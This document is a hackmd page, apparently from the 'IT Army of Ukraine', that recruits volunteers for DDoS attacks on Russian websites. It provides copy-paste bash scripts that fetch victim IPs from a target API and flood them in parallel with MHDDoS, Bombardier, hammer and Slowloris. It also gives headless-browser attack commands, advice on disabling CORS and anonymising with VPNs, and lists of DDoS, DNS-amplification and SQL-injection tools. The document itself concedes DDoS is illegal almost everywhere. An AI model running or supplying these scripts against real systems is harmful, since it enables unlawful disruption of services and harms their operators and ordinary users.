owned this note
owned this note
Published
Linked with GitHub
IT Army of Ukraine - Cyber Weapons Division
===
## Introduction
Russia has invaded Ukraine and commited various [war crimes](https://edition.cnn.com/2022/02/26/europe/ukraine-russia-invasion-sunday-intl-hnk/index.html). Russian media denies any of its attacks on civilian as well as denies any Russian troops casualties. According to them, they are doing this "special operation" to protect Ukrainians from... Ukraine.
[Mykhailo Federov](https://twitter.com/FedorovMykhailo) (Vice Prime Minister and Minister of Digital Transformation of Ukraine) has shared [this twitter post](t.me/itarmyofurraine) encouraging cyber attack on certain targets via [Telegram group](https://t.me/itarmyofukraine2022). This will be the primary source of the target websites for this application.
Some foreign media and even countries (e.g. Belarus) [publicly support Russian aggression towards Ukraine.](https://time.com/6151347/belarus-russia-ukraine/)
More info at https://war.ukraine.ua/
**BEWARE, It's a cyberwar, but DDoS is considered illegal in almost every country.**
**Also, you will risk having your internet blocked by your provider or having your contract cancelled.**
_I don`t support aggression over peaceful entities, but we are in war, we are defending ourselves, and helping the assaulted to defend from its agressor, in that case, I dont see any ethical or moral violation in DDoSing the agressor_
This document is in constant update. You may find new and updated content as you visit this document again.
## Usage
### Using a Web Browser
Your mission here is simple, you will [DDoS](https://en.wikipedia.org/wiki/Denial-of-service_attack) on strategic Russian websites/endpoints in order to take them down or significantly distrupt their services.
By now you have two different methods, first is using one of the URLs below. The other option is by using a DDoS script on Ubuntu Linux.
You may want to use a VPN service to hide your identity before doing it, I recommend using [Hola VPN on Opera Browser](https://addons.opera.com/en/extensions/details/hola-better-internet/)
> [Opera Browser also has a built-in VPN option](https://blogs.opera.com/news/2016/09/how-to-set-up-a-vpn-mac-windows-linux/)
I also recommend [changing your DNS server](https://www.windowscentral.com/how-change-your-pcs-dns-settings-windows-10) to [9.9.9.9](https://www.quad9.net/) and using [DNS over HTTPS](https://4sysops.com/archives/secure-dns-requests-over-https-doh-in-windows-1011/), and also use [randomized MAC Addresses](https://support.microsoft.com/en-us/windows/how-to-use-random-hardware-addresses-in-windows-ac58de34-35fc-31ff-c650-823fc48eb1bc#:~:text=a%20specific%20network%3A-,Select%20the%20Start%20button%2C%20then%20select%20Settings%20%3E%20Network%20%26%20Internet,hardware%20addresses%20for%20this%20network.)
If you're ok with Linux, ideally you may want to [boot a Tails Linux OS](https://www.techrepublic.com/article/getting-started-with-tails-the-encrypted-leave-no-trace-operating-system/#:~:text=During%20the%20bootup%20process%2C%20press,on%20your%20second%20USB%20drive.) Instead, this is the safest option.
**You can use any of the following website below, just leave it opened in your browser as long as possible:**
**https://fuckyourussianwarship.netlify.app**
**https://ddosmonitor.pp.ua/**
Also check:
>
> **https://github.com/Arriven/db1000n**
>
> Cossacks, we present you a new weapon!
>
> Our own program - Death by 1000 needles (DB1000N)
>
> This is software for coordinated DDoS attacks on the occupier's infrastructure. The main advantage of this method is that users only need to run the program on a PC to carry out attacks, and all coordination will be carried out and configured by administrators with the support of cybersecurity specialists.
>
> Instructions for use and all necessary links are in this document
>
> Please join everyone and download the program to your PC before the evening attacks, because then we will carry out the first attack with DB1000N. Stay tuned for the channel and upcoming updates.
Other options:
https://stop-russian-desinformation.near.page/
https://the-list.ams3.cdn.digitaloceanspaces.com/index.html
https://russianwarshipgofuckyourself.club/
https://norussian.tk/
https://stopwarnow.github.io/
https://ipfs.io/ipfs/QmYKMHHNfdxfhDtXujimFaG83ZkgkTo61p8jZ6Dww9kJaN?filename=index.html
_IPFS is a distributed uncensorable file system, please upload the html/js DDoS tools to IPFS nodes to avoid censorship, and let me know to update the document with the IPFS link._
Disabling CORS is necessary to be able to get the most performance out of those pages.
See how [here](https://stackoverflow.com/a/58658101/1644554).
Or you can simply [use a browser extension](https://chrome.google.com/webstore/detail/cors-unblock/lfhmikememgdcahcdlaciloancbhjino)
If you want to attack a single target you can use: https://freestresser.to/
> You can verify some Russian servers' status at https://rustatus.xyz/status, https://ddosmonitor.pp.ua/ and http://ru-stats.eastasia.cloudapp.azure.com/status
> If you need to verify an individual site, use https://downforeveryoneorjustme.com/gazprom.ru
> You can monitor the attack progress by pressing F12 (open dev tools) and navigating to the Network tab.
> You can use a headless browser on the command line with those websites like Firefox.
> With a headless browser you can attack using https://shell.cloud.google.com
> You can [enable WSL](https://www.configserverfirewall.com/windows-10/windows-subsystem-for-linux-2/) to use a Linux Shell on your Windows system
With WSL you can run all the scripts below in this article
Firefox Windows:
`firefox --headless --private-window https://norussian.tk/`
Chrome Windows:
`"[CHROME PATH HERE]/chrome.exe" --disable-web-security https://norussian.tk/`
Chrome Mac:
`open -na Google\ Chrome --args --user-data-dir=/tmp/temporary-chrome-profile-dir --disable-web-security --disable-site-isolation-trial https://norussian.tk/`
### Petitions and other forms of helping
Please sign
* https://chng.it/6QLhvNkNQM
Send SMS message to Russian people, help fight Russian propaganda
https://1920.in/
You can also write messages in Russian maps locations using this tool
https://github.com/jamesdh/kompromat
### Using on Ubuntu Linux
If you're a more advanced user, you can run a shell script on a Ubuntu Linux system to DDoS the websites.
This is a script that I have made to run multiple parallel DDoS attacks.
There is this tool, very nice indeed: https://github.com/seedpockets/ukrainian-warship
The API currently have more than 3000 targets, the script will random select 100 of the total.
We will improve the API to give precedence to priority targets and classify the targets, like military, business, the state, banks, crypto exchanges and etc...
Please use a VPN before using the script, ask on Telegram groups, there is a lot of NordVPN account they are sharing, also check free options in this document below.
You can also utilize this script on your Android device with Termux.
https://github.com/TermuxHackz/Hammer
Please check this awesome endeavour: https://github.com/prividcasper/RvK01RMD
Note that those tools were made for single URLs only, so using them on multiple URLs with this script may be hardware intensive.
To run the script, just copy and paste this on your terminal, and you're done. Leave it as long as possible:
> If you dont want to run it on your computer you can use https://shell.cloud.google.com.
See how [here](https://www.youtube.com/watch?v=gfuaRFfato8) or [here](https://www.aparat.com/v/XPn5Z)
Or you can use the free VPSs listed in the footer of the document.
#### Using the script with [MHDDoS](https://github.com/MHProDev/MHDDoS)
DDoS Attack Script With 40 Methods
```
#!/usr/bin/env bash
sudo apt update
sudo apt upgrade
sudo apt install jq
sudo apt install git
sudo apt install python
sudo apt install python
sudo apt install python3-pip
git clone https://github.com/MHProDev/MHDDoS.git
cd MHDDoS
pip3 install -r requirements.txt
targets_api="http://164.92.247.88:9300/victims"
curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt
for target in $(cat targets.txt); do
python3 start.py bypass "$target" 5 1000 socks5.txt 100 999999 &
done
```
#### Using the script with [Bombardier](https://github.com/codesenberg/bombardier)
Bombardier is a HTTP(S) benchmarking tool. It is written in Go programming language and uses excellent fasthttp instead of Go's default http library, because of its lightning fast performance.
```
#!/usr/bin/env bash
sudo apt update
sudo apt upgrade
sudo apt install jq
wget https://github.com/codesenberg/bombardier/releases/download/v1.2.5/bombardier-linux-amd6
chmod 770 bombardier-linux-amd64
chmod +x bombardier-linux-amd64
targets_api="http://164.92.247.88:9300/victims"
curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt
for target in $(cat targets.txt); do
sudo ./bombardier-linux-amd64 -c 200 -d 99999999999s -l "$target" &
done
```
Upgraded version:
```
#!/usr/bin/env bash
# settings
NUM_TARGETS=20
WORKERS=100
TARGETS_REFRESH=300
INSTALL_PATH="$HOME/cyberdefence-ua-ops"
BOMBARDIER_EXE="./bombardier-linux-amd64"
## make sure software is updated and dependencies are installed
sudo apt update
sudo apt upgrade
sudo apt install jq
sudo apt install curl
sudo apt install wget
## ensure we have Bombardier
# make sure path exists
mkdir -p "$INSTALL_PATH"
cd "$INSTALL_PATH"
# if exe is not there, then fetch it
if [[ ! -x "$BOMBARDIER_EXE" ]]; then
wget https://github.com/codesenberg/bombardier/releases/download/v1.2.5/bombardier-linux-amd64
chmod +x bombardier-linux-amd64
fi
# "Curated" API for targets
targets_api="http://164.92.247.88:9300/victims"
# loop forever until ^C interrupt
while :
do
# Get list of IPs from API, filter duplicates, random sort, and choose designated number
curl -s $targets_api | \
jq -r .statuses[].ips[] | \
sort --unique | \
sort --random-sort | \
head -n "$NUM_TARGETS" \
> targets.txt
# Loop through target IP list, start subprocess for each one
for target in $(cat targets.txt); do
#echo "$target"
echo "$BOMBARDIER_EXE" -c "$WORKERS" -d "$TARGETS_REFRESH""s" -l "$target"
"$BOMBARDIER_EXE" -c "$WORKERS" -d "$TARGETS_REFRESH""s" -l "$target" &
done
# ideally all target processes should be done after this, but we'll make sure
sleep "$TARGETS_REFRESH"
killall "$BOMBARDIER_EXE"
done
```
#### Using the script with [hammer](https://github.com/cyweb/hammer)
DoS tools written in Python
```
#!/usr/bin/env bash
sudo apt update
sudo apt upgrade
sudo apt install python
sudo apt install git
sudo apt install syslinux-utils
sudo apt install jq
git clone https://github.com/cyweb/hammer
cd hammer
targets_api="http://164.92.247.88:9300/victims"
curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 2 > targets.txt
for target in $(cat targets.txt); do
target=$(echo $target | sed 's/https\?:\/\///') &&
target=${target%/} &&
target=$(gethostip "$target" | awk '{print $2}') &&
python3 hammer.py -s "$target" &
done
```
#### Using the script with [Slowloris](https://github.com/gkbrk/slowloris.git)
Send authorized HTTP traffic to the server.
As it makes the attack at a slow rate, traffic can be easily detected as abnormal and can be blocked.
```
#!/usr/bin/env bash
sudo apt update
sudo apt upgrade
sudo apt install python
sudo apt install git
sudo apt install jq
git clone https://github.com/gkbrk/slowloris.git
cd slowloris
targets_api="http://164.92.247.88:9300/victims"
curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt
for target in $(cat targets.txt); do
python3 slowloris.py "$target" &
done
```
##### For MacOS Users
You need Python, Git, and JQ installed.
If you wanna user another tool, tune accordingly.
```
git clone https://github.com/cyweb/hammer
cd hammer
targets_api="http://164.92.247.88:9300/victims"
curl -s $targets_api | jq -r .statuses[].ip | sort --random-sort | head -n 100 > targets.txt
for target in $(cat targets.txt); do
target=$(echo $target | sed 's/https\?:\/\///') &&
target=${target%/} &&
host=$(echo $target | cut -d'/' -f3) &&
target2=$(host "$host" | head -1 | awk '{print $4}') &&
python3 hammer.py -s "$target2" &
done
```
### API For Devs
If you're a developer, We have created APIs with the current targets.
You can help me improving this document, but you will need to create an account on hackmd.io and text me on Telegram with the email you used in order to have edit access to this document.
* **Curated API Endpoint** http://164.92.247.88:9300/victims
* **RAW API Endpoint:** https://api.npoint.io/7244571a09d1f5274a45
* **Another API** https://itarmy.pp.ua/api/?type=online
You can fetch the data using the targets list and the target object name. On the command line, you will need curl and jq.
`curl -s https://api.npoint.io/7244571a09d1f5274a45 | jq -r .targets[].target`
`curl -s http://164.92.247.88:9300/victims | jq -r .statuses[].url`
### Current Targets
Processed, ranked and classified:
https://reqbin.com/jeqixot4
Raw data:
https://reqbin.com/hot28zo2
Another source:
https://itarmy.pp.ua/api/?type=online
### Free VPS
https://aws.amazon.com/pt/free/
https://www.oracle.com/cloud/free/
https://gratisvps.net/
https://baehost.com/en-int/vps-argentina/vps-gratis
### Free VPNs
ClearVPN
* Register on https://my.clearvpn.com/
* Select a Redeem a promocode button
* Enter promocode **SAVEUKRAINE**
* [Download and install ClearVpn application](https://macpaw.com/clearvpn)
* Login to your account.
* Press the "Change your location" button and change it to Russia (prefer) or another country.
**Please, do not select Ukraine on the VPN. Citizens in Ukraine must be able to access the Internet**
https://protonvpn.com/
https://www.f-secure.com/
https://www.urban-vpn.com/
https://atlasvpn.com/vpn-for-windows
### Another DDoS Tools
This is one is hot:
https://github.com/seedpockets/ukrainian-warship
https://github.com/ajax-lives/NoRussian - HTML ajax ddos
https://github.com/smok-serwis/siege-engine - take a look
https://github.com/1N3/Sn1per - useful to do main recon
https://github.com/thesc1entist/j0lt - dns amplification tool
https://github.com/OffensivePython/Saddam - dns amplification tool
https://github.com/0xc0d/Slow-Loris - Slow DDos to exhaust connection
https://github.com/XCHADXFAQ77X/SLOWLORIS - another way
https://github.com/gkbrk/slowloris.git - another slowloris repo
https://github.com/cyweb/hammer - tool that I have used
https://github.com/TermuxHackz/Hammer - same tools for Termux on android.
https://github.com/Avielyo10/DNS-Amplification-Lab - other kinds of attack
https://www.yougetsignal.com/tools/web-sites-on-web-server/ https://www.ip-address.org/reverse-lookup/reverse-ip.php - find other websites hosted on the same server.
https://github.com/LimerBoy/Impulse
https://github.com/maxng07/dns-flood
https://ufonet.03c8.net/
https://github.com/MHProDev/MHDDoS - Best DDoS Attack Script Python3, Cyber Attack With 40 Methods
https://sourceforge.net/projects/loic/ - Famous LOIC
UDP, TCP, and HTTP requests to the server
Test the performance of the network.
Loic does not hide an IP address.
Perform stress testing.
HIVEMIND mode will allow you to control remote LOIC systems. With the help of this, you can control other computers in a zombie network.
https://sourceforge.net/projects/highorbitioncannon/ - infamous hoic
Attack up to 256 websites at once.
counter to measure the output.
ported over to Linux or Mac OS.
### Shut Down YouTube Channels!
Let's shut down more news YouTube channels that openly lie about the war in Ukraine.
YouTube channels:
First channel: https://www.youtube.com/channel/UCX9-cJy8dZWDI8hCnmahuLA
Russia 24: https://www.youtube.com/c/Russia24TV
TASS: https://www.youtube.com/c/TASSagency
RIA Novosti: https://www.youtube.com/user/rianovosti
https://www.youtube.com/channel/UC8Nl7TQLC6eX8MTRCuAw3SA
https://www.youtube.com/channel/UCGRcod_jR4sC9XUMLCv4GJQ
https://www.youtube.com/channel/UCSqO8lV-ric7ow5G5q9roWw
https://www.youtube.com/channel/UCdyhZX5wt6B6dSIAT7X9dNw
https://www.youtube.com/channel/UCRHhScZmH-SfBin8tbTixPA
https://www.youtube.com/channel/UC3rZ3DKoeiccjl-e-lams_g
https://www.youtube.com/channel/UCJvDYmmZDbeDy5N_aBxXjpA
https://www.youtube.com/channel/UCMTaJV_Gyp1YOWJwSNa0wRw
https://www.youtube.com/channel/UC8lCS8Ubv3t0-Tf4IYLioTA
YouTube-blogers:
ZIMA LIVE: https://www.youtube.com/c/ZimaLive
Соловьёв LIVE: https://www.youtube.com/channel/UCQ4YOFsXjG9eXWZ6uLj2t2A
How to report channels:
⁃ Turn on your laptop or desktop computer.
⁃ Turn on VPN as most channels are not available in Ukraine.
⁃ Sign in to your YouTube account.
⁃ Open the desired channel.
⁃ Go to the About tab.
⁃ Find the flag image and click on it.
⁃ Select the appropriate violation description from the drop-down menu.
### SQLi
https://hackertarget.com/sqlmap-tutorial/
https://www.binarytides.com/sqlmap-hacking-tutorial/
### Also check out other initiatives:
https://github.com/erkexzcx/stoppropaganda
https://www.reddit.com/r/hacking/comments/t1a8is/simple_html_dos_script_for_russian_sites/
https://www.russianwarchatter.info/ - Known Russian Military Frequencies
### Specialize
If you want to become an expert and I.T Security field you may want to start reading those curated awesome guides:
https://github.com/onlurking/awesome-infosec
https://github.com/rmusser01/Infosec_Reference
Sign in with Wallet
